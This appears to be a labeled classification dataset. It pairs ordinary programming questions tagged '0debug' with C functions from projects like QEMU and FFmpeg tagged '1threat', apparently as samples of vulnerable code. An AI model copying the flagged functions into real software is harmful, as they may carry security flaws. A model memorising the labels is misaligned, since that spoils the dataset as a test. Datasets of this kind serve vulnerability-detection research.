0debug
Javascript Regex Global Edit Not Working : Disclaimer: I am not a regex user... my solution came from another Stackoverflow question. I am at wit's end as to why this does not work... tested on node.. trying to remove all instances of "RADAL...^" with a space ------------------------------------------------ txt = "RADALL^follow up blah blah- Pt continues on ~RADALL4^ test it now"; txt = txt.replace(/RADAL.\^/g, " "); ------------------------------------------------ returns --> follow up blah blah- Pt continues on ~RADALL4^ test it now I have also looped "while txt.search("RADAL") > -1" followed by the txt.replace(...) It still only removes the first and loops forever since the second is not removed. Any help would be greatly appreciated!
0debug
I am searching for a spell checker which is easily implemented to work with django and python 2.7 : <p>I want to check for a spelling mistakes while user is typing and it should support different languages. Thanks for your help guys</p>
0debug
How to update a single firebase firestore document : <p>After authenticating i'm trying to lookup a user document at /users/, then i'd like to update the document with data from auth object as well some custom user properties. But I'm getting an error that the update method doesn't exist. Is there a way to update a single document? All the firestore doc examples assume you have the actual doc id, and they don't have any examples querying with a where clause. </p> <pre><code>firebase.firestore().collection("users").where("uid", "==", payload.uid) .get() .then(function(querySnapshot) { querySnapshot.forEach(function(doc) { console.log(doc.id, " =&gt; ", doc.data()); doc.update({foo: "bar"}) }); }) </code></pre>
0debug
linux Uinsg write command to communicate with other users : I am learning linux and I am learning how to communicate with other users in addition, I am using ubuntu and I already have a existing user and when I try to use the command write to communicate with other user write lex pts/5 a error pop out, write: you are uid 1000, but your login is as uid 1001 I thought the shell will allow communication in different uid, so it cannot? is there any ways to fix this? Thank
0debug
Get json from php to android : I cant give jason from php to android I want send data to php and insert to database and give json data after insert database in android insert database process is true but i cant give json data in android! I use AsyncTask in this code please help me try { //connect to php and send data code... HttpResponse response = httpclient.execute(httppost); InputStream inputStream = response.getEntity().getContent(); String result = convertInputStreamToString(inputStream); if (result != null) { try { JSONObject json = new JSONObject(result); Log.i("json", json.getString("insert_sucss")); if (json.has("insert_err")) { Toast.makeText(RegisterActivity.this, json.getString("insert_err"), Toast.LENGTH_LONG).show(); } if (json.has("insert_sucss")) { Toast.makeText(RegisterActivity.this, json.getString("insert_sucss"), Toast.LENGTH_LONG).show(); } } catch (JSONException e) { e.printStackTrace(); } } } catch (Exception e) { Log.e("log_tag", "Error: " + e.toString()); } return null; } private String convertInputStreamToString(InputStream inputStream) { try { BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); StringBuilder builder = new StringBuilder(); String line = ""; while ((line = reader.readLine()) != null) { builder.append(line); } return builder.toString(); } catch (IOException e) { e.printStackTrace(); } return null; }
0debug
roundAndPackFloat128( flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1, uint64_t zSig2 STATUS_PARAM) { int8 roundingMode; flag roundNearestEven, increment, isTiny; roundingMode = STATUS(float_rounding_mode); roundNearestEven = ( roundingMode == float_round_nearest_even ); increment = ( (int64_t) zSig2 < 0 ); if ( ! roundNearestEven ) { if ( roundingMode == float_round_to_zero ) { increment = 0; } else { if ( zSign ) { increment = ( roundingMode == float_round_down ) && zSig2; } else { increment = ( roundingMode == float_round_up ) && zSig2; } } } if ( 0x7FFD <= (uint32_t) zExp ) { if ( ( 0x7FFD < zExp ) || ( ( zExp == 0x7FFD ) && eq128( LIT64( 0x0001FFFFFFFFFFFF ), LIT64( 0xFFFFFFFFFFFFFFFF ), zSig0, zSig1 ) && increment ) ) { float_raise( float_flag_overflow | float_flag_inexact STATUS_VAR); if ( ( roundingMode == float_round_to_zero ) || ( zSign && ( roundingMode == float_round_up ) ) || ( ! zSign && ( roundingMode == float_round_down ) ) ) { return packFloat128( zSign, 0x7FFE, LIT64( 0x0000FFFFFFFFFFFF ), LIT64( 0xFFFFFFFFFFFFFFFF ) ); } return packFloat128( zSign, 0x7FFF, 0, 0 ); } if ( zExp < 0 ) { if ( STATUS(flush_to_zero) ) return packFloat128( zSign, 0, 0, 0 ); isTiny = ( STATUS(float_detect_tininess) == float_tininess_before_rounding ) || ( zExp < -1 ) || ! increment || lt128( zSig0, zSig1, LIT64( 0x0001FFFFFFFFFFFF ), LIT64( 0xFFFFFFFFFFFFFFFF ) ); shift128ExtraRightJamming( zSig0, zSig1, zSig2, - zExp, &zSig0, &zSig1, &zSig2 ); zExp = 0; if ( isTiny && zSig2 ) float_raise( float_flag_underflow STATUS_VAR); if ( roundNearestEven ) { increment = ( (int64_t) zSig2 < 0 ); } else { if ( zSign ) { increment = ( roundingMode == float_round_down ) && zSig2; } else { increment = ( roundingMode == float_round_up ) && zSig2; } } } } if ( zSig2 ) STATUS(float_exception_flags) |= float_flag_inexact; if ( increment ) { add128( zSig0, zSig1, 0, 1, &zSig0, &zSig1 ); zSig1 &= ~ ( ( zSig2 + zSig2 == 0 ) & roundNearestEven ); } else { if ( ( zSig0 | zSig1 ) == 0 ) zExp = 0; } return packFloat128( zSign, zExp, zSig0, zSig1 ); }
1threat
aws-sdk: crash after updating from angular5 to angular6 : <p>I just updated to Angular 6.0 from Angular 5.2, my code now break with this error:</p> <pre><code>core.js:1601 ERROR Error: Uncaught (in promise): ReferenceError: global is not defined ReferenceError: global is not defined at Object../node_modules/buffer/index.js (index.js:43) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserHashUtils.js (browserHashUtils.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserHmac.js (browserHmac.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserCryptoLib.js (browserCryptoLib.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browser_loader.js (browser_loader.js:4) at __webpack_require__ (bootstrap:81) at Object../node_modules/buffer/index.js (index.js:43) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserHashUtils.js (browserHashUtils.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserHmac.js (browserHmac.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserCryptoLib.js (browserCryptoLib.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browser_loader.js (browser_loader.js:4) at __webpack_require__ (bootstrap:81) </code></pre> <p>anybody knows the problem? I have tried ng update but seems like aws-sdk-js doesn’t provide the schematics for updating</p>
0debug
static void update(NUTContext *nut, int stream_index, int64_t frame_start, int frame_type, int frame_code, int key_frame, int size, int64_t pts){ StreamContext *stream= &nut->stream[stream_index]; stream->last_key_frame= key_frame; nut->last_frame_start[ frame_type ]= frame_start; update_lru(stream->lru_pts_delta, pts - stream->last_pts, 3); update_lru(stream->lru_size , size, 2); stream->last_pts= pts; if( nut->frame_code[frame_code].flags & FLAG_PTS && nut->frame_code[frame_code].flags & FLAG_FULL_PTS) stream->last_full_pts= pts; }
1threat
password validation with yup and formik : <p>how would one go about having password validation but at the same time having the errors be passed to different variables? </p> <p>i.e </p> <pre><code>password: Yup.string().required("Please provide a valid password"), passwordMin: Yup.string().oneOf([Yup.ref('password'), null]).min(8, 'Error'), passwordLC: Yup.string().oneOf([Yup.ref('password'), null]).matches(/[a-z]/, "Error" ) passwordUC: Yup.string().oneOf([Yup.ref('password'), null]).matches(/[A-Z]/, "Error" ) </code></pre> <p>I cant get the binding of the password variables to bind with the password object</p>
0debug
Is it possible to send SMS over Wifi in Android App? : I'm working on an Android application in Android Studio and wanted to add a feature that allowed a text (SMS) message to be sent from the application to a mobile phone number. I found one way to do this by using the SMS Manager API, but it seems like this only works if the application is run on a cell phone with a SIM Card/Data plan. I'd like the user to be able to send a text over WiFi in case they're running the application on a tablet with only WiFi or another device that only has access to a WiFi connection. The application would only send messages to a mobile number, and doesn't need to worry about receiving texts back from said mobile number. My initial research proves that it is not possible to send SMS messages over WiFi. My question is, is this actually the case? Or does anyone know of a way to do this over a WiFi connection? Even if I don't use SMS, I'd like some other way to get a message from the device to a mobile phone number. I just figured that SMS would be the most straight forward. Thanks for your time!
0debug
My simple webview application is suspended on googleplayconsole now how can i publish again or remove it.? : <p>before yesterday i uploaded my application and yesterday i get this response</p> <blockquote> <p>An email with details about the removal has been sent to the account owner at myEmail@gmail.com. Before uploading any new applications, please review the Developer Distribution Agreement and Developer Program Policies. If you feel we have made this determination in error, you can visit this Google Play Help Center article to learn how you can appeal against the removal.</p> </blockquote> <p>and solve this errors and now again upload application and now i get this error.</p> <blockquote> <p>You need to use a different package name because "com.app.my_appliaction_name" is already used by one of your other applications.</p> </blockquote>
0debug
static int openfile(char *name, int flags, int growable, QDict *opts) { Error *local_err = NULL; if (qemuio_bs) { fprintf(stderr, "file open already, try 'help close'\n"); return 1; } if (growable) { if (bdrv_open(&qemuio_bs, name, NULL, opts, flags | BDRV_O_PROTOCOL, NULL, &local_err)) { fprintf(stderr, "%s: can't open device %s: %s\n", progname, name, error_get_pretty(local_err)); error_free(local_err); return 1; } } else { qemuio_bs = bdrv_new("hda", &error_abort); if (bdrv_open(&qemuio_bs, name, NULL, opts, flags, NULL, &local_err) < 0) { fprintf(stderr, "%s: can't open device %s: %s\n", progname, name, error_get_pretty(local_err)); error_free(local_err); bdrv_unref(qemuio_bs); qemuio_bs = NULL; return 1; } } return 0; }
1threat
static void xics_kvm_realize(DeviceState *dev, Error **errp) { KVMXICSState *icpkvm = KVM_XICS(dev); XICSState *icp = XICS_COMMON(dev); int i, rc; Error *error = NULL; struct kvm_create_device xics_create_device = { .type = KVM_DEV_TYPE_XICS, .flags = 0, }; if (!kvm_enabled() || !kvm_check_extension(kvm_state, KVM_CAP_IRQ_XICS)) { error_setg(errp, "KVM and IRQ_XICS capability must be present for in-kernel XICS"); goto fail; } spapr_rtas_register(RTAS_IBM_SET_XIVE, "ibm,set-xive", rtas_dummy); spapr_rtas_register(RTAS_IBM_GET_XIVE, "ibm,get-xive", rtas_dummy); spapr_rtas_register(RTAS_IBM_INT_OFF, "ibm,int-off", rtas_dummy); spapr_rtas_register(RTAS_IBM_INT_ON, "ibm,int-on", rtas_dummy); rc = kvmppc_define_rtas_kernel_token(RTAS_IBM_SET_XIVE, "ibm,set-xive"); if (rc < 0) { error_setg(errp, "kvmppc_define_rtas_kernel_token: ibm,set-xive"); goto fail; } rc = kvmppc_define_rtas_kernel_token(RTAS_IBM_GET_XIVE, "ibm,get-xive"); if (rc < 0) { error_setg(errp, "kvmppc_define_rtas_kernel_token: ibm,get-xive"); goto fail; } rc = kvmppc_define_rtas_kernel_token(RTAS_IBM_INT_ON, "ibm,int-on"); if (rc < 0) { error_setg(errp, "kvmppc_define_rtas_kernel_token: ibm,int-on"); goto fail; } rc = kvmppc_define_rtas_kernel_token(RTAS_IBM_INT_OFF, "ibm,int-off"); if (rc < 0) { error_setg(errp, "kvmppc_define_rtas_kernel_token: ibm,int-off"); goto fail; } rc = kvm_vm_ioctl(kvm_state, KVM_CREATE_DEVICE, &xics_create_device); if (rc < 0) { error_setg_errno(errp, -rc, "Error on KVM_CREATE_DEVICE for XICS"); goto fail; } icpkvm->kernel_xics_fd = xics_create_device.fd; object_property_set_bool(OBJECT(icp->ics), true, "realized", &error); if (error) { error_propagate(errp, error); goto fail; } assert(icp->nr_servers); for (i = 0; i < icp->nr_servers; i++) { object_property_set_bool(OBJECT(&icp->ss[i]), true, "realized", &error); if (error) { error_propagate(errp, error); goto fail; } } kvm_kernel_irqchip = true; kvm_irqfds_allowed = true; kvm_msi_via_irqfd_allowed = true; kvm_gsi_direct_mapping = true; return; fail: kvmppc_define_rtas_kernel_token(0, "ibm,set-xive"); kvmppc_define_rtas_kernel_token(0, "ibm,get-xive"); kvmppc_define_rtas_kernel_token(0, "ibm,int-on"); kvmppc_define_rtas_kernel_token(0, "ibm,int-off"); }
1threat
static int draw_text(AVFilterContext *ctx, AVFilterBufferRef *picref, int width, int height) { DrawTextContext *dtext = ctx->priv; uint32_t code = 0, prev_code = 0; int x = 0, y = 0, i = 0, ret; int max_text_line_w = 0, len; int box_w, box_h; char *text = dtext->text; uint8_t *p; int y_min = 32000, y_max = -32000; int x_min = 32000, x_max = -32000; FT_Vector delta; Glyph *glyph = NULL, *prev_glyph = NULL; Glyph dummy = { 0 }; time_t now = time(0); struct tm ltime; uint8_t *buf = dtext->expanded_text; int buf_size = dtext->expanded_text_size; if(dtext->basetime != AV_NOPTS_VALUE) now= picref->pts*av_q2d(ctx->inputs[0]->time_base) + dtext->basetime/1000000; if (!buf) { buf_size = 2*strlen(dtext->text)+1; buf = av_malloc(buf_size); } #if HAVE_LOCALTIME_R localtime_r(&now, &ltime); #else if(strchr(dtext->text, '%')) ltime= *localtime(&now); #endif do { *buf = 1; if (strftime(buf, buf_size, dtext->text, &ltime) != 0 || *buf == 0) break; buf_size *= 2; } while ((buf = av_realloc(buf, buf_size))); if (dtext->tc_opt_string) { char tcbuf[AV_TIMECODE_STR_SIZE]; av_timecode_make_string(&dtext->tc, tcbuf, dtext->frame_id++); buf = av_asprintf("%s%s", dtext->text, tcbuf); } if (!buf) return AVERROR(ENOMEM); text = dtext->expanded_text = buf; dtext->expanded_text_size = buf_size; if ((len = strlen(text)) > dtext->nb_positions) { if (!(dtext->positions = av_realloc(dtext->positions, len*sizeof(*dtext->positions)))) return AVERROR(ENOMEM); dtext->nb_positions = len; } x = 0; y = 0; for (i = 0, p = text; *p; i++) { GET_UTF8(code, *p++, continue;); dummy.code = code; glyph = av_tree_find(dtext->glyphs, &dummy, glyph_cmp, NULL); if (!glyph) { load_glyph(ctx, &glyph, code); } y_min = FFMIN(glyph->bbox.yMin, y_min); y_max = FFMAX(glyph->bbox.yMax, y_max); x_min = FFMIN(glyph->bbox.xMin, x_min); x_max = FFMAX(glyph->bbox.xMax, x_max); } dtext->max_glyph_h = y_max - y_min; dtext->max_glyph_w = x_max - x_min; glyph = NULL; for (i = 0, p = text; *p; i++) { GET_UTF8(code, *p++, continue;); if (prev_code == '\r' && code == '\n') continue; prev_code = code; if (is_newline(code)) { max_text_line_w = FFMAX(max_text_line_w, x); y += dtext->max_glyph_h; x = 0; continue; } prev_glyph = glyph; dummy.code = code; glyph = av_tree_find(dtext->glyphs, &dummy, glyph_cmp, NULL); if (dtext->use_kerning && prev_glyph && glyph->code) { FT_Get_Kerning(dtext->face, prev_glyph->code, glyph->code, ft_kerning_default, &delta); x += delta.x >> 6; } dtext->positions[i].x = x + glyph->bitmap_left; dtext->positions[i].y = y - glyph->bitmap_top + y_max; if (code == '\t') x = (x / dtext->tabsize + 1)*dtext->tabsize; else x += glyph->advance; } max_text_line_w = FFMAX(x, max_text_line_w); dtext->var_values[VAR_TW] = dtext->var_values[VAR_TEXT_W] = max_text_line_w; dtext->var_values[VAR_TH] = dtext->var_values[VAR_TEXT_H] = y + dtext->max_glyph_h; dtext->var_values[VAR_MAX_GLYPH_W] = dtext->max_glyph_w; dtext->var_values[VAR_MAX_GLYPH_H] = dtext->max_glyph_h; dtext->var_values[VAR_MAX_GLYPH_A] = dtext->var_values[VAR_ASCENT ] = y_max; dtext->var_values[VAR_MAX_GLYPH_D] = dtext->var_values[VAR_DESCENT] = y_min; dtext->var_values[VAR_LINE_H] = dtext->var_values[VAR_LH] = dtext->max_glyph_h; dtext->x = dtext->var_values[VAR_X] = av_expr_eval(dtext->x_pexpr, dtext->var_values, &dtext->prng); dtext->y = dtext->var_values[VAR_Y] = av_expr_eval(dtext->y_pexpr, dtext->var_values, &dtext->prng); dtext->x = dtext->var_values[VAR_X] = av_expr_eval(dtext->x_pexpr, dtext->var_values, &dtext->prng); dtext->draw = av_expr_eval(dtext->draw_pexpr, dtext->var_values, &dtext->prng); if(!dtext->draw) return 0; box_w = FFMIN(width - 1 , max_text_line_w); box_h = FFMIN(height - 1, y + dtext->max_glyph_h); if (dtext->draw_box) ff_blend_rectangle(&dtext->dc, &dtext->boxcolor, picref->data, picref->linesize, width, height, dtext->x, dtext->y, box_w, box_h); if (dtext->shadowx || dtext->shadowy) { if ((ret = draw_glyphs(dtext, picref, width, height, dtext->shadowcolor.rgba, &dtext->shadowcolor, dtext->shadowx, dtext->shadowy)) < 0) return ret; } if ((ret = draw_glyphs(dtext, picref, width, height, dtext->fontcolor.rgba, &dtext->fontcolor, 0, 0)) < 0) return ret; return 0; }
1threat
static av_cold int xwd_encode_close(AVCodecContext *avctx) { av_freep(&avctx->coded_frame); return 0; }
1threat
static int kvm_dirty_pages_log_change(target_phys_addr_t phys_addr, target_phys_addr_t end_addr, unsigned flags, unsigned mask) { KVMState *s = kvm_state; KVMSlot *mem = kvm_lookup_slot(s, phys_addr); if (mem == NULL) { dprintf("invalid parameters %llx-%llx\n", phys_addr, end_addr); return -EINVAL; } flags = (mem->flags & ~mask) | flags; if (flags == mem->flags) return 0; mem->flags = flags; return kvm_set_user_memory_region(s, mem); }
1threat
net core api controller unit testing using xunit and moq : <p>i have some api controller methods that i would like to add some unit tests to. I am using xunit and moq and writing in c# using asp net core.</p> <p>example of one method is:</p> <pre><code>public async Task&lt;ActionResult&lt;List&lt;StatusDTO&gt;&gt;&gt; Get() { return await _statusservice.GetStatusesAsync(); } </code></pre> <p>at this point in time my controller method is simply returning the dto that the service layer method is returning. In future it might change to return a specific viewmodel.</p> <p>i have read <a href="https://docs.microsoft.com/en-us/aspnet/core/mvc/controllers/testing?view=aspnetcore-2.2" rel="nofollow noreferrer">https://docs.microsoft.com/en-us/aspnet/core/mvc/controllers/testing?view=aspnetcore-2.2</a> to get some guidance on testing controllers.</p> <p>My question is : for example above would the unit test just consist of - checking that the return type is <code>ActionResult&lt;StatusDTO&gt;</code> and/or (using moq) verifying the service method has been called. </p> <p>Should i set up my service method to return a mock <code>StatusDTO</code> and do some assertions against that. I don't see benefit of that in this situation, as that would be testing the service method wouldn't it and i would cover that in the service method tests.</p> <p>Sorry if this seems quite basic - my knowledge and experience in writing unit tests is very limited. Thanks for any help.</p>
0debug
EC2 or S3 to host AngularJS app? : <p>I want to launch a production version of an AngularJS application, and I find Amazon AWS to be an awesome hosting suite. As AngularJS is essentially static it could be hosted on S3 storage, or on an EC2 server with node.js backend. </p> <p>Either of these solutions would suit my deployment method, so the question is, will I (in theory) get better performance from one or the other, and why? Is there anything wrong with hosting a professional website frontend on S3? Does anyone have any experience with both methods? The site involves streaming audio, video and potentially many many users. </p> <p>Any advice appreciated. </p>
0debug
which is the best gem for push notifications on android with ruby on rails 4+? : <p>actually, i want to send push notification on submit button. when the user presses the button then on the android phone getting a push notification.</p>
0debug
How do I make background code? : <p>I want to make background code that checks if someone hit "H","D", or other letters. Like This,(I mean a background code that is checking this.)</p> <pre><code>if(e.KeyCode == Keys.U) { code; } </code></pre>
0debug
truncating last two characters from SQL MST 2014 : This will seem rudimentary but trying the substring command to no avail. Using substring('indcode',1,4). The values are 6 characters long and I need the last two deleted from them. In short, I need them truncated from 6 to 4. Also, in the table indcode is set as a char(6). Could that be why I get an incorrect syntax error when I use that subtring command?
0debug
static void cmd_inquiry(IDEState *s, uint8_t *buf) { int max_len = buf[4]; buf[0] = 0x05; buf[1] = 0x80; buf[2] = 0x00; buf[3] = 0x21; buf[4] = 31; buf[5] = 0; buf[6] = 0; buf[7] = 0; padstr8(buf + 8, 8, "QEMU"); padstr8(buf + 16, 16, "QEMU DVD-ROM"); padstr8(buf + 32, 4, s->version); ide_atapi_cmd_reply(s, 36, max_len); }
1threat
Formatting hours and minutes in django backend : <p>I have a method in my django app (1.8).</p> <p>From date recived from <strong>date_start</strong> field: <code>2017-01-26 18:00:00+00:00</code> I want to get hours and minutes. But my code didn't works:</p> <pre><code>@property def time(self): return '{%H:%M}'.format(self.date_start) </code></pre>
0debug
int ram_save_live(Monitor *mon, QEMUFile *f, int stage, void *opaque) { ram_addr_t addr; uint64_t bytes_transferred_last; double bwidth = 0; uint64_t expected_time = 0; if (stage < 0) { cpu_physical_memory_set_dirty_tracking(0); return 0; } if (cpu_physical_sync_dirty_bitmap(0, TARGET_PHYS_ADDR_MAX) != 0) { qemu_file_set_error(f, -EINVAL); return 0; } if (stage == 1) { RAMBlock *block; bytes_transferred = 0; last_block = NULL; last_offset = 0; sort_ram_list(); QLIST_FOREACH(block, &ram_list.blocks, next) { for (addr = block->offset; addr < block->offset + block->length; addr += TARGET_PAGE_SIZE) { if (!cpu_physical_memory_get_dirty(addr, MIGRATION_DIRTY_FLAG)) { cpu_physical_memory_set_dirty(addr); } } } cpu_physical_memory_set_dirty_tracking(1); qemu_put_be64(f, ram_bytes_total() | RAM_SAVE_FLAG_MEM_SIZE); QLIST_FOREACH(block, &ram_list.blocks, next) { qemu_put_byte(f, strlen(block->idstr)); qemu_put_buffer(f, (uint8_t *)block->idstr, strlen(block->idstr)); qemu_put_be64(f, block->length); } } bytes_transferred_last = bytes_transferred; bwidth = qemu_get_clock_ns(rt_clock); while (!qemu_file_rate_limit(f)) { int bytes_sent; bytes_sent = ram_save_block(f); bytes_transferred += bytes_sent; if (bytes_sent == 0) { break; } } bwidth = qemu_get_clock_ns(rt_clock) - bwidth; bwidth = (bytes_transferred - bytes_transferred_last) / bwidth; if (bwidth == 0) { bwidth = 0.000001; } if (stage == 3) { int bytes_sent; while ((bytes_sent = ram_save_block(f)) != 0) { bytes_transferred += bytes_sent; } cpu_physical_memory_set_dirty_tracking(0); } qemu_put_be64(f, RAM_SAVE_FLAG_EOS); expected_time = ram_save_remaining() * TARGET_PAGE_SIZE / bwidth; return (stage == 2) && (expected_time <= migrate_max_downtime()); }
1threat
Python "equal to" and "not equal to" : <p>I was doing a practice question and couldn't figure out what I was doing wrong. Seems I was a little confused about how <code>or</code> should work.</p> <p>I'll pass both a range of numbers from 13 - 19:</p> <pre><code>for i in range(13,20): func(i) </code></pre> <blockquote> <p>Function 1</p> </blockquote> <pre><code>def func(n): if n == 15 or n == 16: pass else: n = 0 </code></pre> <blockquote> <p>Result 1</p> </blockquote> <pre><code>0 0 15 16 0 0 0 </code></pre> <p>So if n is equal to 15 or if <code>n</code> is equal to 16, pass. Anything else, make it 0. Makes sense.</p> <blockquote> <p>Function 2</p> </blockquote> <pre><code>def func(n): if n != 15 and n != 16: n = 0 else: pass </code></pre> <blockquote> <p>Result 2</p> </blockquote> <pre><code>0 0 15 16 0 0 0 </code></pre> <p>If <code>n</code> is not equal to 15 or 16, make it 0. Else, pass. Again, makes sense.</p> <p>Here's where I get a little unstuck:</p> <blockquote> <p>Function 3</p> </blockquote> <pre><code>def func(n): if n == 15 and n == 16: pass else: n = 0 </code></pre> <blockquote> <p>Result 3</p> </blockquote> <pre><code>0 0 0 0 0 0 0 </code></pre> <p><em>I think</em> the result is due to both conditions for <code>n</code> needing to be met; if is equal both 15 <strong>and</strong> 16, pass, else make it zero. I get that.</p> <blockquote> <p>Function 4</p> </blockquote> <pre><code>def func(n): if n != 15 or n != 16: n = 0 else: pass </code></pre> <blockquote> <p>Result 4</p> </blockquote> <pre><code>0 0 0 0 0 0 0 </code></pre> <p>If <code>n</code> is not equal 15 or <code>n</code> is not equal to 16, then it should be zero. </p> <p><em>I think</em> this means <code>or</code> somehow works the same way as <code>and</code> in that both conditions must be met, but was wondering if someone more knowledgeable could explain?</p>
0debug
How to replace string in angular 2? : <p>I have used with below interpolation in html page.</p> <pre><code>&lt;div&gt;{{config.CompanyAddress.replace('\n','&lt;br /&gt;')}}&lt;/div&gt; </code></pre> <p>and also used</p> <pre><code>&lt;div&gt;{{config.CompanyAddress.toString().replace('\n','&lt;br /&gt;')}}&lt;/div&gt; </code></pre> <p>But both are showing text as below</p> <pre><code>{{config.CompanyAddress.replace('\n','&lt;br /&gt;')}} {{config.CompanyAddress.toString().replace('\n','&lt;br /&gt;')}} </code></pre>
0debug
int64_t qmp_query_migrate_cache_size(Error **errp) { return migrate_xbzrle_cache_size(); }
1threat
how to insert html after a specific element with a class using jQuery : <pre><code> &lt;html&gt; &lt;body&gt; &lt;div class="carousel-inner"&gt; &lt;!-- my jQuery content here --&gt; &lt;a data-slide="prev" href="#quote-carousel" class="left carousel-control"&gt;&lt;i class="fa fa-chevron-left"&gt;&lt;/i&gt;&lt;/a&gt; &lt;/div&gt; </code></pre> <p>I am producing an html snippet and wanted to know how I can insert the html within the DIV tags shown above. Specifically immediately after the <strong>div class="carousel-inner"</strong> and before the <strong>a data-slide</strong></p> <p>I tried using </p> <pre><code> $('body').append(html); </code></pre> <p>but that added the html to the end of the file </p>
0debug
Schedule a work on a specific time with WorkManager : <blockquote> <p>WorkManager is a library used to enqueue work that is guaranteed to execute after its constraints are met.</p> </blockquote> <p>Hence, After going though the <a href="https://developer.android.com/reference/androidx/work/Constraints" rel="noreferrer">Constraints</a> class I haven't found any function to add time constraint on the work. For like example, I want to start a work to perform at 8:00am (The work can be any of two types <a href="https://developer.android.com/reference/androidx/work/OneTimeWorkRequest" rel="noreferrer">OneTimeWorkRequest</a> or <a href="https://developer.android.com/reference/androidx/work/PeriodicWorkRequest" rel="noreferrer">PeriodicWorkRequest</a>) in the morning. How can I add constraint to schedule this work with WorkManager.</p>
0debug
static void test_validate_fail_list(TestInputVisitorData *data, const void *unused) { UserDefOneList *head = NULL; Error *err = NULL; Visitor *v; v = validate_test_init(data, "[ { 'string': 'string0', 'integer': 42 }, { 'string': 'string1', 'integer': 43 }, { 'string': 'string2', 'integer': 44, 'extra': 'ggg' } ]"); visit_type_UserDefOneList(v, &head, NULL, &err); g_assert(err); error_free(err); qapi_free_UserDefOneList(head); }
1threat
Error invalid operands to binary : <p>I am a beginner and I am using dev c++ . I am trying to write a function to determine which quadrant it lies in. Its fairly simple, but I am getting an error [Error] invalid operands to binary &lt;&lt; (have 'float' and 'int')</p> <pre><code>#include &lt;stdio.h&gt; int quadrant (float i, float j); int main() { float a,b; int c; scanf ("%f,%f",&amp;a,&amp;b); c=quadrant(a,b); printf("the given point lies in %d quadrant",c); return 0; } int quadrant (float i, float j) { if (i&gt;&gt;0 &amp;&amp; j&gt;&gt;0) return 1; else if (i&gt;&gt;0 &amp;&amp; j&lt;&lt;0) return 4; else if (i&lt;&lt;0 &amp;&amp; j&gt;&gt;0) return 2; else if (i&lt;&lt;0 &amp;&amp; j&lt;&lt;0) return 3; else return 0; } </code></pre> <p>Is it because float numbers cant be used with binary operands? I replaced floats with int, all the floats. This time when I compile I get error ID: return 1 status. What is wrong with my code?</p>
0debug
uint64_t kvmppc_rma_size(uint64_t current_size, unsigned int hash_shift) { if (cap_ppc_rma >= 2) { return current_size; } return MIN(current_size, getrampagesize() << (hash_shift - 7)); }
1threat
static int qcow2_create(const char *filename, QEMUOptionParameter *options) { const char *backing_file = NULL; const char *backing_fmt = NULL; uint64_t sectors = 0; int flags = 0; size_t cluster_size = DEFAULT_CLUSTER_SIZE; int prealloc = 0; while (options && options->name) { if (!strcmp(options->name, BLOCK_OPT_SIZE)) { sectors = options->value.n / 512; } else if (!strcmp(options->name, BLOCK_OPT_BACKING_FILE)) { backing_file = options->value.s; } else if (!strcmp(options->name, BLOCK_OPT_BACKING_FMT)) { backing_fmt = options->value.s; } else if (!strcmp(options->name, BLOCK_OPT_ENCRYPT)) { flags |= options->value.n ? BLOCK_FLAG_ENCRYPT : 0; } else if (!strcmp(options->name, BLOCK_OPT_CLUSTER_SIZE)) { if (options->value.n) { cluster_size = options->value.n; } } else if (!strcmp(options->name, BLOCK_OPT_PREALLOC)) { if (!options->value.s || !strcmp(options->value.s, "off")) { prealloc = 0; } else if (!strcmp(options->value.s, "metadata")) { prealloc = 1; } else { fprintf(stderr, "Invalid preallocation mode: '%s'\n", options->value.s); return -EINVAL; } } options++; } if (backing_file && prealloc) { fprintf(stderr, "Backing file and preallocation cannot be used at " "the same time\n"); return -EINVAL; } return qcow2_create2(filename, sectors, backing_file, backing_fmt, flags, cluster_size, prealloc, options); }
1threat
document.location = 'http://evil.com?username=' + user_input;
1threat
how best find data with getJSON? : i have problem to filtering data with `jquery` and `json` how do the best find data with `javascript` ? help find solved my problem. thanks this my code [here][1] [1]: https://jsfiddle.net/vgrj1L80/110/
0debug
What is the best way to implement multi tenancy in Azure Database : <p>We are planning to implement a multi tenant application in Azure cloud. I am looking for a best way to implement this in DB level. The DB schema is huge, we have 100s of tables spread across multiple modules. And the data size varies for each client. For some it might be 100s of rows in the tables. But for some it could be millions of rows. What is the best approach to implement Elastic DB in these kind of scenarios?</p> <p>How do i design sharding in this case? Single tenant per shard or list of tenants? If I create a list of tenants per shard and adjacent tenants have lot of data and it will be overcrowded. How can we efficiently find a shard key to partition?</p> <p>If I do single tenant per shard, Can I scale up single shard based on the data size?</p> <p>Did anyone came across these kind of scenarios? Please help me with some sample links?</p> <p>Thank you for your Help! </p>
0debug
Different behaviour when running script vs IRB console? : <p>I have a simple code snippet that defines a method (on Ruby's Main Object), and then checks to see if it is defined.</p> <pre><code>puts "#{self} #{self.class}" def foo;end puts self.methods.include?(:foo) </code></pre> <p>When I run this in a Ruby console. I get:</p> <pre><code>main Object true </code></pre> <p>If I paste this code into a .rb file and run the file like so <code>ruby test_script.rb</code>, I get the following output</p> <pre><code>main Object false </code></pre> <p>I can't work out why I am seeing this behaviour. The method <em>is</em> being defined in the script, as I can call the method.</p> <p>I'm running both on Ruby 2.3.4</p>
0debug
The scanf don't store my sum : <p>When the code run, my scanf don't show the sum, just 0.00000000.</p> <p>I don't know where is the problem.</p> <pre><code>int main() { float A, B; float R = A+B; printf("Digita o valor A: "); scanf("%f",&amp;A); printf("Digite o valor B: "); scanf("%f",&amp;B); printf("A soma de %f e %f foi igual a: %f",A,B,R); return 0; } </code></pre>
0debug
